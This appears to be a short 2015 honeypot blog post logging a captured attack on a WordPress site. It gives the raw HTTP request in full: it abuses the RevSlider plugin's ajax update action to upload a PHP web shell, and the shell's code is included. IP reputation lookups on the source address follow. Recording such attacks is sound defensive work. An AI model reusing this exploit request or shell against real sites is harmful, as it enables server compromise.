Samstag, 8. August 2015

Wordpress NULLpOint7r__zemua.php - 192.203.127.198

BEGIN OF HTTP DATA:
2015-08-07 18:24:03
Source IP: 192.203.127.198
Country: US RiskScore: 1 Malware: []
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: johest.de
Content-Length: 654
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:36.0) Gecko/20100101 Firefox/36.0
Connection: keep-alive
Content-Type: multipart/form-data; boundary=d7711a4c77de4aff8673ca44662115c1

--d7711a4c77de4aff8673ca44662115c1
Content-Disposition: form-data; name="action"

revslider_ajax_action
--d7711a4c77de4aff8673ca44662115c1
Content-Disposition: form-data; name="client_action"

update_plugin
--d7711a4c77de4aff8673ca44662115c1
Content-Disposition: form-data; name="update_file"; filename="NULLpOint7r__zemua.php"
Content-Type: text/html

<?php @set_time_limit(0);@header('null77: pOinter');?><form method='POST' enctype='multipart/form-data'><input type='file' name='f'/><input type='submit' value='up'/></form><?php echo @copy($_FILES['f']['tmp_name'],$_FILES['f']['name'])?'ok':'no';?>
--d7711a4c77de4aff8673ca44662115c1--
received yesterday on my honeypot.
The attack seems to be optimized for Wordpress and targets  /wp-admin/admin-ajax.php directly. As you can see in the code, it tries to upload a php file.

IBM XForce has no record on this ip.

IPVoid instead:
Analysis Date2 seconds ago
Blacklist StatusBLACKLISTED 2/40
IP Address192.203.127.198 ( Websites Lookup )
Reverse DNSUnknown
ASNAS7018
ASN OwnerAT&amp;T Services, Inc.
ISPTuskegee University
ContinentNorth America
Country CodeFlag (US) United States
Latitude / Longitude32.4172 / -85.7191
CityTuskegee Institute
RegionAlabama